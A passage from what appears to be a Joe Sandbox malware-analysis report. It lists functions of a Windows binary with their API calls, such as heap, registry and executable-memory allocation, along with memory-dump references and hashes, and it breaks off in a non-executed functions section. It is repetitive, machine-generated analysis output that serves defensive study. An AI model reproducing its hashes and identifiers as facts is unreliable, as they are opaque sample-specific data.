                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Heap$AllocateCloseCreateHandleMessageProcessReadSize
                                                                • String ID:
                                                                • API String ID: 749537981-0
                                                                • Opcode ID: 4f7bb720d2e01f8983ae0954a15bef8dc3cd7fd3d81463fb6a7b77a6ca83b96d
                                                                • Instruction ID: b0f5b7e34a998acfc825b17d2971736302182a16368fbd127285adb01735bf30
                                                                • Opcode Fuzzy Hash: 4f7bb720d2e01f8983ae0954a15bef8dc3cd7fd3d81463fb6a7b77a6ca83b96d
                                                                • Instruction Fuzzy Hash: 06F04476204340BBE3219B64ECC9F9B76ACEB84B24F104A2DF7169A1D1E674A904C765
                                                                Function 004CEBA0 Relevance: 4.6, APIs: 3, Instructions: 93registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyA.ADVAPI32(00000000,00000000,?), ref: 004CEC29
                                                                • RegQueryValueExA.ADVAPI32 ref: 004CEC52
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004CEC70
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 3764a443deadd06c4a0d82dedec28b419bbbc1afda03b0f2d4d3c80ed3f27859
                                                                • Instruction ID: 4cf950411e1953979288e3df13bf5bb7bab8559ec715c5f8ddde97f22ba18a99
                                                                • Opcode Fuzzy Hash: 3764a443deadd06c4a0d82dedec28b419bbbc1afda03b0f2d4d3c80ed3f27859
                                                                • Instruction Fuzzy Hash: E42105752042455BE328DA25AC45FBB76C8FBC0724F084A2EFE4587281DB79DD0983A9
                                                                Function 00429C90 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00401009), ref: 00429C90
                                                                • CoInitialize.OLE32(00000000), ref: 00429C9D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: HeapInitializeProcess
                                                                • String ID: `B
                                                                • API String ID: 1740904833-3602356314
                                                                • Opcode ID: d13fbe667554f4f222c042abc57d3d67203191cce2fc9df8ff623d9356d53f74
                                                                • Instruction ID: 3521e008686e00f503bfc0c44891b9bca2654c31a954ef26948e6775ba85c4bf
                                                                • Opcode Fuzzy Hash: d13fbe667554f4f222c042abc57d3d67203191cce2fc9df8ff623d9356d53f74
                                                                • Instruction Fuzzy Hash: 4BE086317042709FD3148F69FE44B563794A704750F044035EA0ACF2A3D6A9AC008B5A
                                                                Function 004DE497 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,004DC1E0,00000001), ref: 004DE4A8
                                                                  • Part of subcall function 004DE34F: GetVersionExA.KERNEL32 ref: 004DE36E
                                                                • HeapDestroy.KERNEL32 ref: 004DE4E7
                                                                  • Part of subcall function 004DF49E: RtlAllocateHeap.NTDLL(00000000,00000140,004DE4D0), ref: 004DF4AB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateCreateDestroyVersion
                                                                • String ID:
                                                                • API String ID: 760317429-0
                                                                • Opcode ID: f37498ba757216f82bb105e0301ea33d25a41814505da7b59bdbe9bd2d794452
                                                                • Instruction ID: ff8cbbb7c7025ce975ce3e0d66b7e0a0ed3ddf66254f0808e1d380523409e837
                                                                • Opcode Fuzzy Hash: f37498ba757216f82bb105e0301ea33d25a41814505da7b59bdbe9bd2d794452
                                                                • Instruction Fuzzy Hash: 27F09B70658301BADB307B766E657373696D740B55F10843BF401CD3A0EF68C5C1961A
                                                                Function 004D3C1E Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,004D16FF,00000001,?,?,00000006,?,00462F85,00000000,00000000,00000000), ref: 004D3C2F
                                                                  • Part of subcall function 004D3AD6: GetVersionExA.KERNEL32 ref: 004D3AF5
                                                                • HeapDestroy.KERNEL32(?,?,00000006,?,00462F85,00000000,00000000,00000000), ref: 004D3C6E
                                                                  • Part of subcall function 004D3EAF: RtlAllocateHeap.NTDLL(00000000,00000140,004D3C57), ref: 004D3EBC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateCreateDestroyVersion
                                                                • String ID:
                                                                • API String ID: 760317429-0
                                                                • Opcode ID: ed6dea93d085b8c51aef8621c4c264e54b1b399aca116a1a5bc58684496e68e3
                                                                • Instruction ID: 3f8a39afa2949e5887ed9ba1476d043a838b518f1432fe2233b5bc082f38935c
                                                                • Opcode Fuzzy Hash: ed6dea93d085b8c51aef8621c4c264e54b1b399aca116a1a5bc58684496e68e3
                                                                • Instruction Fuzzy Hash: 18F02B727643015ADF606F319D657373681A751B43F14147BF801D83F0EBA896819A1B
                                                                Function 00429F00 Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsBadReadPtr.KERNEL32(00000000,00000008), ref: 00429F2E
                                                                • RtlFreeHeap.NTDLL(00890000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00429F40
                                                                  • Part of subcall function 00429CE0: GetModuleHandleA.KERNEL32(00000000,00429F86,?,?,?,0041C69B,00000004,00000000,0041C67E,00000000,004EE32A,00000000,00000000,000000FF,?), ref: 00429CEA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHandleHeapModuleRead
                                                                • String ID:
                                                                • API String ID: 627478288-0
                                                                • Opcode ID: 91b97a74fc8769d31267806e5bfbec472b0aa46679cc5094d22786670b564bc1
                                                                • Instruction ID: 614edf61bee2760fde758ee60a613caaf31da13a55459759961ba3211f077b67
                                                                • Opcode Fuzzy Hash: 91b97a74fc8769d31267806e5bfbec472b0aa46679cc5094d22786670b564bc1
                                                                • Instruction Fuzzy Hash: 9BE06D30F04531979B60BB2AFD84A9B339AAB02391F521067F545D3250D2286C408BB8
                                                                Function 004DC49C Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000), ref: 004DC583
                                                                  • Part of subcall function 004E06DB: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004E0718
                                                                  • Part of subcall function 004E06DB: RtlEnterCriticalSection.NTDLL(004DE2E0), ref: 004E0733
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                • String ID:
                                                                • API String ID: 1616793339-0
                                                                • Opcode ID: df58770f71e4f909450a2131a19038da05a12c618640a8083dcc632225e79234
                                                                • Instruction ID: 549bae5cd182ff61da08bc7b16d73df75aa9e233850fe81fc9d92b245d71bdaf
                                                                • Opcode Fuzzy Hash: df58770f71e4f909450a2131a19038da05a12c618640a8083dcc632225e79234
                                                                • Instruction Fuzzy Hash: F221D871A40615BBDB10EB65ECA179EB7A4EB01B64F104617F420EB3C0C778B942DA59
                                                                Function 004D19B0 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 004D1A97
                                                                  • Part of subcall function 004D5158: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004D5195
                                                                  • Part of subcall function 004D5158: RtlEnterCriticalSection.NTDLL(00000010), ref: 004D51B0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                • String ID:
                                                                • API String ID: 1616793339-0
                                                                • Opcode ID: 76ae98cf4207e21c577eb17bb89ad067559ebf69a1b6b1f3b5cdb7821c2d4fb1
                                                                • Instruction ID: 6e0a882ebd3f2de25bda8b1d6f1a11e1b043b656730406b184eb11c9be2acf16
                                                                • Opcode Fuzzy Hash: 76ae98cf4207e21c577eb17bb89ad067559ebf69a1b6b1f3b5cdb7821c2d4fb1
                                                                • Instruction Fuzzy Hash: D8210831A41205BBDB10EFA5DC52B9E77A4EB01764F24011BF820EB3E0C77CAD818B98
                                                                Function 00431410 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LCMapStringA.KERNEL32(00000804,00400000,?,00000000,00000000,00000001), ref: 0043148F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: String
                                                                • String ID:
                                                                • API String ID: 2568140703-0
                                                                • Opcode ID: 4a55086bac393db21a11975f5aa8e2df1c0a5a33614d121d4fecc83aeed80e2f
                                                                • Instruction ID: 60155b1ab0fd761279dd9be98437ebece07d31d22520370c3b0c1c7f9008aac2
                                                                • Opcode Fuzzy Hash: 4a55086bac393db21a11975f5aa8e2df1c0a5a33614d121d4fecc83aeed80e2f
                                                                • Instruction Fuzzy Hash: F511C6B26443143BE21066259C42FBB369CDFCA7ACF14151FF90456242EA6DEA0142EE
                                                                Function 004CEB90 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetCurrentDirectoryA.KERNEL32(00000000,004835B0,00000001,00000000,00000000,80000004), ref: 004CEB95
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentDirectory
                                                                • String ID:
                                                                • API String ID: 1611563598-0
                                                                • Opcode ID: e0760899269c912ab9aadc58472be296380ceadd4e11526be30b7279be39a6c6
                                                                • Instruction ID: 47982069c236c6bb95660f857ea9db8b43855cf3f0976acba5e2a23cd31dae55
                                                                • Opcode Fuzzy Hash: e0760899269c912ab9aadc58472be296380ceadd4e11526be30b7279be39a6c6
                                                                • Instruction Fuzzy Hash: 66A002B5A08245ABCE01DBA9DA8C84A7FACAB85351B004894B149C6063C674D842CB16
                                                                Function 004CB6B0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFileExistsA.SHLWAPI(00000000,0043FC67,00000001,?,00000000,80000004), ref: 004CB6B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID:
                                                                • API String ID: 1174141254-0
                                                                • Opcode ID: b9108c279c0c020b552fc9cf0ef5d346b175744142dfe5c609a52657af39d45c
                                                                • Instruction ID: 73bd5e010877d21f3008d315d7309d94801259343814b74229c968ee39962f68
                                                                • Opcode Fuzzy Hash: b9108c279c0c020b552fc9cf0ef5d346b175744142dfe5c609a52657af39d45c
                                                                • Instruction Fuzzy Hash: 52A00275919341BFCE00DBA4E98C84A7BA8BB84351B504868B189C7421E634D440CB15
                                                                Function 0047EB08 Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,0047E8E5,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 0047EB17
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 6a5c688f70d79bc2af88556774f0c9cdf0549ee203fca10f56ab3ff5853e4b7b
                                                                • Instruction ID: 22da00314316e72c7dcaf330da79d6bfc010a23951a9ab1f7251b8bff67d5928
                                                                • Opcode Fuzzy Hash: 6a5c688f70d79bc2af88556774f0c9cdf0549ee203fca10f56ab3ff5853e4b7b
                                                                • Instruction Fuzzy Hash: 75D0C970248342ABEF26CE628C09F1BBEA9BF84B00F004C0CB3A5B41D0C375E0189A0A

                                                                Non-executed Functions

                                                                Function 004B6690 Relevance: 28.7, APIs: 14, Strings: 2, Instructions: 717stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000), ref: 004B6720
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B67DC
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B690E
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000002), ref: 004B694E
